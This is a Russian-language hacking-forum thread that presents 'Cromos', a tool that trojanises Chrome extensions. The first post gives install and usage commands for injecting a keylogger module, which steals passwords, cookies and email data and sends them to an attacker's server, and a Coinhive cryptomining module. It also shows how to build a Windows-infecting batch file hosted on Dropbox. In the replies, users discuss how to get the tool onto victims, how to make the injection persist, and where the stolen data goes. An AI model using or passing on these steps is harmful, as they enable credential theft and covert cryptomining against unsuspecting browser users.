HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.11.2017, 22:31
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями.



Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.

Функционал:

· Загрузка расширения

· Инъекция кода

· Загрузка файлов в Dropbox

· Заражение ОС семейства Windows

Установка:

> git clone https://github.com/fbctf/cromos

> cd /cromos

> pip install –r requirements.txt

> python setup.py


Справка:

> ./cromos.py –h




Использование:

· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.

> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb

Я использовал QR code scanner.



· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.

> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger




Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.

Модифицированное расширение, можно найти здесь:



Создание пакетного файла и загрузка его в Dropbox:

> python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Модули:

· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.

· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.

Небольшой ролик, по использованию инструмента от разработчиков:

> https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1

На этом можно завершить. Спасибо за уделенное внимание.
 
Ответить с цитированием

  #2  
Старый 14.11.2017, 03:39
crestfo
Новичок
Регистрация: 21.06.2017
Сообщений: 0
С нами: 4681303

Репутация: 0
По умолчанию

Кто-то настраивал на майнинг?) Знает какие параметры указывать?
 
Ответить с цитированием

  #3  
Старый 15.11.2017, 07:16
Петручо
Новичок
Регистрация: 07.07.2009
Сообщений: 2
С нами: 8866038

Репутация: 0
По умолчанию

а юзверям его пропихивать как ? скидивать на страничку с запросом на установку модуля/плагина ?
 
Ответить с цитированием

  #4  
Старый 15.11.2017, 11:26
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

crestfo сказал(а):

Кто-то настраивал на майнинг?) Знает какие параметры указывать?

Загляни в исходник модуля
 
Ответить с цитированием

  #5  
Старый 15.11.2017, 13:15
z3r0c10wn
Новичок
Регистрация: 04.09.2017
Сообщений: 0
С нами: 4573785

Репутация: 0
По умолчанию

Майнинг настраивал. Кого интересует вопрос на данную тему пишите конкретные вопросы. Тулза на самом деле очень простая, в принципе тоже самое делается и без нее ручками, просто дает чуть чуть автоматизации. Но не забываем про подписаные расширения, поэтому инжект будет лишь на 1 сессию так как запуск инжекта идет через chrome.exe --load-extension, а это запуск девелоперской версии хрома. После закрытия которой юзер будет запускать только юзерскую версию. Если хочется прописать юзеру постоянную работу через дев версию - нужно чутка включить голову, вариантов множество.
[doublepost=1510737349,1510737230][/doublepost]Да и маленький моментик для ТСа - стоило описать не много про токен боксы, а так же настройку выгрузки по токену в скриптах.
 
Ответить с цитированием

  #6  
Старый 15.11.2017, 13:25
Hanstalker
Новичок
Регистрация: 21.08.2017
Сообщений: 0
С нами: 4593574

Репутация: 0
По умолчанию

Кейлогер по дефолту отправляет все на www.heroku.com ))
 
Ответить с цитированием

  #7  
Старый 19.12.2017, 21:26
Raskolnikov
Новичок
Регистрация: 18.12.2017
Сообщений: 0
С нами: 4422059

Репутация: 0
По умолчанию

Полезная статья, под лису есть что-то подобное?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...